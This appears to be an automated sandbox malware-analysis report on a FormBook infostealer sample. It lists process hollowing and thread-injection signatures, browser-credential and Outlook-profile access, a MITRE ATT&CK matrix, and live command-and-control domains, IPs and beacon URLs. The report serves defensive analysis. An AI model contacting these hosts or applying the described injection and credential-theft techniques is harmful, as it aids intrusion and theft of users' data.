      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359B171 mov eax, dword ptr fs:[00000030h]10_2_0359B171
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359B171 mov eax, dword ptr fs:[00000030h]10_2_0359B171
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359C962 mov eax, dword ptr fs:[00000030h]10_2_0359C962
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03599100 mov eax, dword ptr fs:[00000030h]10_2_03599100
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03599100 mov eax, dword ptr fs:[00000030h]10_2_03599100
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03599100 mov eax, dword ptr fs:[00000030h]10_2_03599100
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C513A mov eax, dword ptr fs:[00000030h]10_2_035C513A
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C513A mov eax, dword ptr fs:[00000030h]10_2_035C513A
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035B4120 mov eax, dword ptr fs:[00000030h]10_2_035B4120
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035B4120 mov eax, dword ptr fs:[00000030h]10_2_035B4120
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035B4120 mov eax, dword ptr fs:[00000030h]10_2_035B4120
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035B4120 mov eax, dword ptr fs:[00000030h]10_2_035B4120
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035B4120 mov ecx, dword ptr fs:[00000030h]10_2_035B4120
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_036241E8 mov eax, dword ptr fs:[00000030h]10_2_036241E8
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359B1E1 mov eax, dword ptr fs:[00000030h]10_2_0359B1E1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_01339910
      Source: C:\Users\user\Desktop\NHYGUnNN.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 38.55.236.89 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.darkchocolatebliss.com
      Source: C:\Windows\explorer.exeDomain query: www.marketmall.digital
      Source: C:\Windows\explorer.exeNetwork Connect: 172.67.148.132 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 54.38.220.85 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 154.209.6.241 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 89.31.143.1 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.canadianlocalbusiness.com
      Source: C:\Windows\explorer.exeDomain query: www.y31jaihdb6zm87.buzz
      Source: C:\Windows\explorer.exeNetwork Connect: 162.213.255.142 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.ope-cctv.com
      Source: C:\Windows\explorer.exeDomain query: www.dersameh.com
      Sample uses process hollowing technique
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 1010000Jump to behavior
      Maps a DLL or memory area into another process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Writes to foreign memory regions
      Source: C:\Users\user\Desktop\NHYGUnNN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
      Source: C:\Users\user\Desktop\NHYGUnNN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
      Source: C:\Users\user\Desktop\NHYGUnNN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AB0008Jump to behavior
      Allocates memory in foreign processes
      Source: C:\Users\user\Desktop\NHYGUnNN.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
      Injects a PE file into a foreign processes
      Source: C:\Users\user\Desktop\NHYGUnNN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 3452Jump to behavior
      Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3452Jump to behavior
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exeJump to behavior
      Source: explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.295428852.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.241334039.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: XProgram Manager
      Source: explorer.exe, 00000002.00000000.304298844.000000000835D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.253031171.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000002.00000000.295428852.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager (Not Responding)
      Source: explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.295111764.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274166451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.295428852.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.241334039.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\NHYGUnNN.exeQueries volume information: C:\Users\user\Desktop\NHYGUnNN.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\NHYGUnNN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Tries to steal Mail credentials (via file / registry access)
      Source: C:\Windows\SysWOW64\NETSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
      Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
      Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Shared Modules      		Path Interception812
      Process Injection      		1
      Masquerading      		1
      OS Credential Dumping      		21
      Security Software Discovery      		Remote Services1
      Email Collection      		Exfiltration Over Other Network Medium1
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Disable or Modify Tools      		LSASS Memory2
      Process Discovery      		Remote Desktop Protocol1
      Archive Collected Data      		Exfiltration Over Bluetooth3
      Ingress Tool Transfer      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
      Virtualization/Sandbox Evasion      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin Shares1
      Data from Local System      		Automated Exfiltration4
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)812
      Process Injection      		NTDS1
      Remote System Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer114
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information      		LSA Secrets1
      System Network Configuration Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common4
      Obfuscated Files or Information      		Cached Domain Credentials1
      System Network Connections Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items12
      Software Packing      		DCSync1
      File and Directory Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
      System Information Discovery      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 756156 Sample: NHYGUnNN.exe Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 34 Snort IDS alert for network traffic 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 Multi AV Scanner detection for submitted file 2->38 40 4 other signatures 2->40 8 NHYGUnNN.exe 1 2->8         started        process3 file4 22 C:\Users\user\AppData\...22HYGUnNN.exe.log, CSV 8->22 dropped 50 Writes to foreign memory regions 8->50 52 Allocates memory in foreign processes 8->52 54 Injects a PE file into a foreign processes 8->54 12 RegSvcs.exe 8->12         started        signatures5 process6 signatures7 56 Modifies the context of a thread in another process (thread injection) 12->56 58 Maps a DLL or memory area into another process 12->58 60 Sample uses process hollowing technique 12->60 62 Queues an APC in another process (thread injection) 12->62 15 explorer.exe 12->15 injected process8 dnsIp9 24 www.y31jaihdb6zm87.buzz 154.209.6.241, 49721, 49722, 49723 YISUCLOUDLTD-AS-APYISUCLOUDLTDHK Seychelles 15->24 26 www.dersameh.com 89.31.143.1, 49715, 49716, 49717 QSC-AG-IPXDE Germany 15->26 28 4 other IPs or domains 15->28 30 System process connects to network (likely due to code injection or exploit) 15->30 32 Uses netstat to query active network connections and open ports 15->32 19 NETSTAT.EXE 13 15->19         started        signatures10 process11 signatures12 42 Tries to steal Mail credentials (via file / registry access) 19->42 44 Tries to harvest and steal browser information (history, passwords, etc) 19->44 46 Modifies the context of a thread in another process (thread injection) 19->46 48 Maps a DLL or memory area into another process 19->48

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      NHYGUnNN.exe28%ReversingLabsByteCode-MSIL.Trojan.Zilla
      NHYGUnNN.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      1.0.RegSvcs.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.marketmall.digital/4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6m0%Avira URL Cloudsafe
      http://www.ope-cctv.com/4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed0%Avira URL Cloudsafe
      http://www.y31jaihdb6zm87.buzz/4u5a/0%Avira URL Cloudsafe
      www.needook.com/4u5a/0%Avira URL Cloudsafe
      http://www.dersameh.com/4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0s0%Avira URL Cloudsafe
      http://www.marketmall.digital/4u5a/0%Avira URL Cloudsafe
      http://www.darkchocolatebliss.com/4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O20%Avira URL Cloudsafe
      http://www.darkchocolatebliss.com/4u5a/0%Avira URL Cloudsafe
      http://www.y31jaihdb6zm87.buzz/4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0s0%Avira URL Cloudsafe
      http://www.dersameh.com/4u5a/0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      www.darkchocolatebliss.com
      		54.38.220.85
      		truetrue
        		unknown
        www.marketmall.digital
        		162.213.255.142
        		truetrue
          		unknown
          www.canadianlocalbusiness.com
          		172.67.148.132
          		truetrue
            		unknown
            www.y31jaihdb6zm87.buzz
            		154.209.6.241
            		truetrue
              		unknown
              www.ope-cctv.com
              		38.55.236.89
              		truetrue
                		unknown
                www.dersameh.com
                		89.31.143.1
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.y31jaihdb6zm87.buzz/4u5a/true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.marketmall.digital/4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6mtrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.ope-cctv.com/4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDedtrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.dersameh.com/4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0strue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.marketmall.digital/4u5a/true
                  • Avira URL Cloud: safe
                  		unknown
                  www.needook.com/4u5a/true
                  • Avira URL Cloud: safe
                  		low
                  http://www.darkchocolatebliss.com/4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O2true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.y31jaihdb6zm87.buzz/4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0strue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.dersameh.com/4u5a/true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.darkchocolatebliss.com/4u5a/true
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://ac.ecosia.org/autocomplete?q=1--Lt08NN.10.drfalse
                    		high
                    https://search.yahoo.com?fr=crmas_sfp1--Lt08NN.10.drfalse
                      		high
                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.295111764.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274166451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.304813988.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.240724345.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.283521778.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.253709611.0000000008442000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        https://duckduckgo.com/chrome_newtab1--Lt08NN.10.drfalse
                          		high
                          https://duckduckgo.com/ac/?q=1--Lt08NN.10.drfalse
                            		high
                            https://www.google.com/images/branding/product/ico/googleg_lodp.ico1--Lt08NN.10.drfalse
                              		high
                              https://search.yahoo.com?fr=crmas_sfpf1--Lt08NN.10.drfalse
                                		high
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=1--Lt08NN.10.drfalse
                                  		high
                                  https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search1--Lt08NN.10.drfalse
                                    		high
                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=1--Lt08NN.10.drfalse
                                      		high
                                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=1--Lt08NN.10.drfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        38.55.236.89
                                        		www.ope-cctv.comUnited States
                                        		174COGENT-174UStrue
                                        89.31.143.1
                                        		www.dersameh.comGermany
                                        		15598QSC-AG-IPXDEtrue
                                        172.67.148.132
                                        		www.canadianlocalbusiness.comUnited States
                                        		13335CLOUDFLARENETUStrue
                                        54.38.220.85
                                        		www.darkchocolatebliss.comFrance
                                        		16276OVHFRtrue
                                        162.213.255.142
                                        		www.marketmall.digitalUnited States
                                        		22612NAMECHEAP-NETUStrue
                                        154.209.6.241
                                        		www.y31jaihdb6zm87.buzzSeychelles
                                        		136970YISUCLOUDLTD-AS-APYISUCLOUDLTDHKtrue

                                        General Information

                                        Joe Sandbox Version:36.0.0 Rainbow Opal
                                        Analysis ID:756156
                                        Start date and time:2022-11-29 18:23:12 +01:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 8m 47s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:NHYGUnNN.exe
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:12
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@4/2@6/6
                                        EGA Information:
                                        • Successful, ratio: 66.7%
                                        HDC Information:
                                        • Successful, ratio: 41.7% (good quality ratio 36.2%)
                                        • Quality average: 71.1%
                                        • Quality standard deviation: 33.6%
                                        HCA Information:
                                        • Successful, ratio: 95%
                                        • Number of executed functions: 128
                                        • Number of non-executed functions: 199
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
                                        • Execution Graph export aborted for target NHYGUnNN.exe, PID 5380 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.

                                        Simulations

                                        Behavior and APIs

                                        No simulations

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        89.31.143.1Quotation Request - 10001.exeGet hashmaliciousBrowse
                                        • www.wp-operator.online/m5oe/?oB=xlGu1leaJAh2AKGnXNnzLHx74B1pmYMr0B7vG5tLpHDAJtI2JM7xcfrJzlPa4oz70f9GkPr856kINUo9XdcwdhPXbiGwp6Djmg==&-Z=-ZyL
                                        mU1m6ZFe4i.exeGet hashmaliciousBrowse
                                        • www.iray-europe.shop/3i68/?h0GhCL=6Ql6HyCr19luxZowg8/MP9uUxvrtnsq62878LgFx/a63FqAu+X0Ck43Rd0v7cYlBEw6z5zTjIzZhVG3NG8BfrnFF8nUat33REw==&fplTth=P2JdTV90ThJ
                                        HSBC Payment Advice_pdf.exeGet hashmaliciousBrowse
                                        • www.xn--brger-geld-9db.online/figc/?jPHTu=Pt2M/L12wB1N4mtlvBk0/8XP0Cy0Z//wbbtnGokezksYit/rx0ZlM4LWCs4DX1NmdmWEx+JpfJd4tcVknPAANAxU2hxxkj2Svg==&lPyT6=s8Al78
                                        HSBC Payment Adivce_pdf.exeGet hashmaliciousBrowse
                                        • www.xn--brger-geld-9db.online/figc/?c2MHW2=7nDt2b8pVXRlGD-&3fF0b8=Pt2M/L12wB1N4mtlvBk0/8XP0Cy0Z//wbbtnGokezksYit/rx0ZlM4LWCs4DX1NmdmWEx+JpfJd4tcVknPABemVE93kWzWervw==
                                        WGwBG6VUfG.exeGet hashmaliciousBrowse
                                        • www.capex-to-opex.net/fswe/?1bsp224=Xtjd5Nk80sNiJDfuHPUz9QpKaI0/HJcGWPQzaN0O2OzvDOiH9IXniqG+6xacc+hnQY0Y9kl1OsY3f6yOYegGa8lje3+EhLthcQ==&Xjy=2dlt
                                        file.exeGet hashmaliciousBrowse
                                        • www.capex-to-opex.net/fswe/?BJE=6lxXI&J2M=Xtjd5Nk80sNiJDfuHPUz9QpKaI0/HJcGWPQzaN0O2OzvDOiH9IXniqG+6xacc+hnQY0Y9kl1OsY3f6yOYegFUdluLW+23+sFdA==
                                        HSBC Advice_pdf.exeGet hashmaliciousBrowse
                                        • www.xn--brger-geld-9db.online/figc/?4hVpVZKP=Pt2M/L12wB1N4mtlvBk0/8XP0Cy0Z//wbbtnGokezksYit/rx0ZlM4LWCs4DX1NmdmWEx+JpfJd4tcVknPAANAxU2hxxkj2Svg==&qVeLW=QvyH5x0HAT
                                        HSBC Adivce_pdf.exeGet hashmaliciousBrowse
                                        • www.xn--brger-geld-9db.online/figc/?l6Al=Pt2M/L12wB1N4mtlvBk0/8XP0Cy0Z//wbbtnGokezksYit/rx0ZlM4LWCs4DX1NmdmWEx+JpfJd4tcVknPABelVZgEMWwXSzvw==&I2=yVCdVbl0JFsp
                                        HSBC Advice_pdf.exeGet hashmaliciousBrowse
                                        • www.xn--brger-geld-9db.online/figc/?OVk=2dox&6l-H=Pt2M/L12wB1N4mtlvBk0/8XP0Cy0Z//wbbtnGokezksYit/rx0ZlM4LWCs4DX1NmdmWEx+JpfJd4tcVknPABemVE93kWzWervw==
                                        RFQ# 6000163267.jsGet hashmaliciousBrowse
                                        • www.altruista.one/d0ad/?w0DhAV=sqJyaOVlBjEZAVpKsRNl5z7D2pmPxN2fNLntWooOtuBpve/S7gqmy/te6Ibp48h7Rh2wKtnd+VCpDIBxA7IKq3TCOqRHW/5YIA==&P4=5jcLENLXN
                                        africa.exeGet hashmaliciousBrowse
                                        • www.altruista.one/d0ad/?q8AD=7nrDPNR0a&5jCdVR=sqJyaOVlBjEZAVpKsRNl5z7D2pmPxN2fNLntWooOtuBpve/S7gqmy/te6Ibp48h7Rh2wKtnd+VCpDIBxA7IKq3TCOqRHW/5YIA==
                                        HSBC Advice_pdf.exeGet hashmaliciousBrowse
                                        • www.xn--brger-geld-9db.online/figc/?2dUX=SBtt3Tdh04-4krEp&yva=Pt2M/L12wB1N4mtlvBk0/8XP0Cy0Z//wbbtnGokezksYit/rx0ZlM4LWCs4DX1NmdmWEx+JpfJd4tcVknPAAAmRYgE9xyDuOk9DZ543AHBwT
                                        HSBC Advice_pdf.exeGet hashmaliciousBrowse
                                        • www.xn--brger-geld-9db.online/figc/?BVn44=Pt2M/L12wB1N4mtlvBk0/8XP0Cy0Z//wbbtnGokezksYit/rx0ZlM4LWCs4DX1NmdmWEx+JpfJd4tcVknPABemVE93kWzWervw==&oR-T7=3fQ8ylWHVrFp
                                        Technical specification.jsGet hashmaliciousBrowse
                                        • www.altruista.one/d0ad/?6lC=7n3T4DnHj&w0D81F=sqJyaOVlBjEZAVpKsRNl5z7D2pmPxN2fNLntWooOtuBpve/S7gqmy/te6Ibp48h7Rh2wKtnd+VCpDIBxA7ILhUKAA7QkAN9lJQ==
                                        Impship.exeGet hashmaliciousBrowse
                                        • www.hochzeits-werk.net/o8es/?lP8=0ZiXdHMxHnx8&6lod=64jney8VCwLLrmb8cdY22CL6M3exo1XG8KWQT3NaTd8Av+JQPAafYMxGpoW02VIokASZ6LQhYcGXLzkPdv9OKyHcNBtPiGfWzA==
                                        Purchase List_pdf.exeGet hashmaliciousBrowse
